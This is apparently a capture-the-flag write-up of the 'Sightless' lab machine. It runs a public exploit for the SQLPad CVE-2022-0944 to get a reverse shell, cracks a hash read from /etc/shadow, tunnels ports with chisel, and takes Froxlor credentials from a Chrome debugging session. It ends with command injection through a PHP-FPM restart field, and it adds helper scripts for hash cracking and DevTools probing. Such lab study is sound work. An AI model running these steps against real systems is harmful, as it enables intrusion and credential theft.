Reconnaissance & Enumeration#
- Network scan reveals three open ports: FTP (21), SSH and HTTP (80). Port 21 (FTP) is very unusual here.
- Initial enumeration reveals that the site runs nginx/1.18.0.
- Port 80 served a page titled Sightless; while scrolling through I found a button which redirected to sqlpad.sightless.htb. It is a different domain, so I added it to my hosts file and visited it.
- A Google search turned up an RCE vulnerability with a public PoC:
CVE-2022-0944 Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.
Exploitation#
- First I cloned the PoC repo and installed the required packages:
pip3 install -r requirements.txt
- Then I executed the PoC with the target URL plus my machine's IP and a port, and eventually got a shell:
python3 main.py http://sqlpad.sightless.htb/ 10.10.14.12 6001
- There was an SQLite file in the current working directory, but there was no way to transfer it to my machine because no version of Python was found on the system.
- Then I got to know that this is a Docker container.

- It is weird to have this directory here.
- Anyway, from /etc/passwd I learned about the two users with a bash login shell.
- From /etc/shadow I got the hash of user michael for cracking. Ignore the root hash; I am pretty sure it would be a waste of time.

- After identifying the hash type (the $6$ prefix is sha512crypt, hashcat mode 1800), I cracked it with my go-to tool:
hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
- Then I logged in via SSH.
- Got the user flag.
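Picking the right hashcat mode is the step that goes wrong most often with shadow hashes. The following is an added example (not part of the original writeup) that pulls the crackable accounts out of an /etc/shadow dump, skips locked or passwordless entries, maps each hash prefix to its hashcat mode and emits user:hash lines for hashcat's --username option. The shadow lines are constructed and the hash bodies are placeholders of the right length, not real hashes.

```python
# Added example, not from the writeup: select crackable /etc/shadow entries
# and map each hash prefix to the hashcat mode (michael's $6$ hash -> 1800).
_FAKE_BODY = "A" * 86  # placeholder: sha512crypt bodies are 86 base64 chars

# Constructed sample, not the real shadow file from the box.
SAMPLE_SHADOW = f"""\
root:$6$rootsalt${_FAKE_BODY}:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
michael:$6$michsalt${_FAKE_BODY}:19000:0:99999:7:::
nobody:!:19000:0:99999:7:::
"""

# Hash prefix -> hashcat mode. yescrypt ($y$) has no hashcat mode.
HASHCAT_MODES = {
    "$1$": 500,    # md5crypt
    "$2a$": 3200,  # bcrypt variants
    "$2b$": 3200,
    "$2y$": 3200,
    "$5$": 7400,   # sha256crypt
    "$6$": 1800,   # sha512crypt
}


def hashcat_mode(hash_field):
    """Return the hashcat -m value for a crypt(3) hash, or None if unsupported."""
    for prefix, mode in HASHCAT_MODES.items():
        if hash_field.startswith(prefix):
            return mode
    return None


def parse_shadow(text):
    """Return [{user, hash, mode, locked}] for entries that carry a real hash."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, hash_field = fields[0], fields[1]
        # A leading '!' marks a locked account; a real hash may still follow it.
        locked = hash_field.startswith("!")
        hash_field = hash_field.lstrip("!")
        if hash_field in ("", "*"):
            continue  # no password set or login disabled: nothing to crack
        entries.append({"user": user, "hash": hash_field,
                        "mode": hashcat_mode(hash_field), "locked": locked})
    return entries


def hashcat_input(entries, mode):
    """user:hash lines for one mode, to be used with `hashcat --username`."""
    return [f"{e['user']}:{e['hash']}" for e in entries if e["mode"] == mode]


if __name__ == "__main__":
    found = parse_shadow(SAMPLE_SHADOW)
    for e in found:
        print(f"{e['user']}: mode {e['mode']}{' (locked)' if e['locked'] else ''}")
    print("\n".join(hashcat_input(found, 1800)))
```

Save the emitted lines to a file and run hashcat -m 1800 --username hashes.txt /usr/share/wordlists/rockyou.txt; --username makes hashcat ignore the user: prefix and report which account each cracked password belongs to.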


Privilege Escalation#
- While doing post-enumeration I found some interesting local ports using ss -tunlp.
- Too many ports, don't ya think. Kinda sus if you ask me.


- So I decided to forward all the weird-looking ports to my machine.
- On my machine
chisel server -p 7001 --reverse
- On the target machine
./chisel client 10.10.14.12:7001 R:3306:localhost:3306 R:44771:localhost:44771 R:8080:localhost:8080 R:43047:localhost:43047 R:41049:localhost:41049 R:3000:localhost:3000 R:33060:localhost:33060
- Not gonna lie, that's a lot of ports.
- It seems that port 8080 is running Froxlor, which required credentials to log in. What is Froxlor? From its own description:
The server administration software for your needs. Developed by experienced server administrators, this panel simplifies the effort of managing your hosting platform.
- All the remaining ports seem suspicious, since most are non-HTTP ones.
- Some of the ports are Chrome remote-debugging (DevTools) listeners, used internally to automate some task.
- So I opened Chrome, navigated to chrome://inspect/#devices and added all the forwarded ports under Configure.
- Got some hits. I clicked Inspect and watched the browser automatically log into Froxlor with credentials.
- In the Network tab, in the auth request, I saw the credentials in plaintext.
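The pivot above has two mechanical steps that are easy to automate: building the chisel reverse-forward list from the ss output, and working out which of the forwarded ports actually speak the Chrome DevTools protocol (chrome://inspect does the same thing by polling each port's /json endpoints). The block below is an added example written for this writeup, not code from the original post or from chisel or Chrome. The ss output and the /json/list response are constructed samples modelled on the ports listed above; the server address 10.10.14.12:7001 is the one used in the chisel commands.

```python
import http.client
import json
import urllib.error
import urllib.request

# Constructed `ss -tunlp` sample (not the real capture from the box).
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
tcp   LISTEN 0      4096   127.0.0.1:3306       0.0.0.0:*
tcp   LISTEN 0      511    127.0.0.1:8080       0.0.0.0:*
tcp   LISTEN 0      4096   127.0.0.1:3000       0.0.0.0:*
tcp   LISTEN 0      4096   127.0.0.1:41049      0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22           0.0.0.0:*
tcp   LISTEN 0      511    *:80                 *:*
udp   UNCONN 0      0      127.0.0.53%lo:53     0.0.0.0:*
"""

# Constructed sample of what GET http://127.0.0.1:<port>/json/list returns
# from a Chrome instance started with --remote-debugging-port.
SAMPLE_JSON_LIST = json.dumps([
    {"id": "1A2B", "type": "page", "title": "Froxlor",
     "url": "http://127.0.0.1:8080/index.php",
     "webSocketDebuggerUrl": "ws://127.0.0.1:41049/devtools/page/1A2B"},
    {"id": "3C4D", "type": "page", "title": "about:blank",
     "url": "about:blank",
     "webSocketDebuggerUrl": "ws://127.0.0.1:41049/devtools/page/3C4D"},
])


def loopback_listeners(ss_output):
    """TCP ports that listen on loopback only: the ones worth forwarding."""
    ports = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "tcp" or fields[1] != "LISTEN":
            continue
        host, _, port = fields[4].rpartition(":")
        host = host.split("%")[0].strip("[]")  # drop scope id / IPv6 brackets
        if host in ("127.0.0.1", "::1"):
            ports.add(int(port))
    return sorted(ports)


def chisel_client_args(server, ports):
    """`chisel client` argv with one reverse forward (R:port:localhost:port) per port."""
    return ["chisel", "client", server] + [f"R:{p}:localhost:{p}" for p in ports]


def devtools_targets(json_list_text):
    """Flatten a DevTools /json/list response into the fields chrome://inspect shows."""
    return [{"type": t.get("type"), "title": t.get("title"), "url": t.get("url"),
             "ws": t.get("webSocketDebuggerUrl")} for t in json.loads(json_list_text)]


def find_devtools(ports, host="127.0.0.1", timeout=2.0):
    """Probe /json/version on each port; return {port: browser string} for hits.

    Non-DevTools services (MySQL, Froxlor, ...) either refuse, time out or
    answer with something that is not JSON; all of those are skipped."""
    found = {}
    for port in ports:
        try:
            url = f"http://{host}:{port}/json/version"
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                info = json.loads(resp.read().decode("utf-8", "replace"))
        except (OSError, ValueError, http.client.HTTPException):
            continue  # urllib.error.URLError is an OSError subclass
        if isinstance(info, dict) and "webSocketDebuggerUrl" in info:
            found[port] = info.get("Browser", "unknown")
    return found


if __name__ == "__main__":
    ports = loopback_listeners(SAMPLE_SS)
    print(" ".join(chisel_client_args("10.10.14.12:7001", ports)))
    for t in devtools_targets(SAMPLE_JSON_LIST):
        print(f"{t['type']:<6} {t['title']!r:<14} {t['url']}  ->  {t['ws']}")
    print(find_devtools(ports))  # empty unless the forwards are actually up
```

Once a port answers on /json/version, the page targets from /json/list can be opened in DevTools via chrome://inspect, or a CDP client can attach to the webSocketDebuggerUrl and subscribe to Network.requestWillBeSent, which is where the Froxlor login POST (and its plaintext credentials) shows up.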

- Used those creds and got into Froxlor.
- While looking around, I discovered a potential endpoint that could lead to command injection.

- Created a new PHP version under PHP-FPM versions.
- In the php-fpm restart command field I entered:
cp /root/root.txt /home
- Then went to Settings and restarted php-fpm.
- After 3-5 minutes (the command is run by Froxlor's periodic cron job, which runs as root, hence it can read /root) the file showed up in the home directory, but it was root-owned and not readable by my user, so using the same method I changed the command to:
chmod 777 /home/root.txt
- This makes the copied file readable.
- Got the root flag. Then I realised that from the start I should have changed the permissions on the root directory itself.

Summary#
The Sightless machine is an easy-difficulty Linux machine. The walkthrough details the process of exploiting several vulnerabilities to gain root access.
Initial Foothold: The website uses an SQLPad instance vulnerable to template injection (CVE-2022-0944), which is used to gain access to a Docker container.
SSH Access: The /etc/shadow file is found within the Docker container, revealing a password hash. Cracking this hash provides SSH access to the host machine.
Privilege Escalation: A Froxlor instance vulnerable to Blind XSS (CVE-2024-34070) is exploited to gain access to the FTP service. This FTP service contains a KeePass database. Accessing this database reveals the root SSH keys, granting a privileged shell on the host. The route taken in this walkthrough differs: the Froxlor credentials were captured from the Chrome remote-debugging session, and root was reached through the PHP-FPM restart command instead.



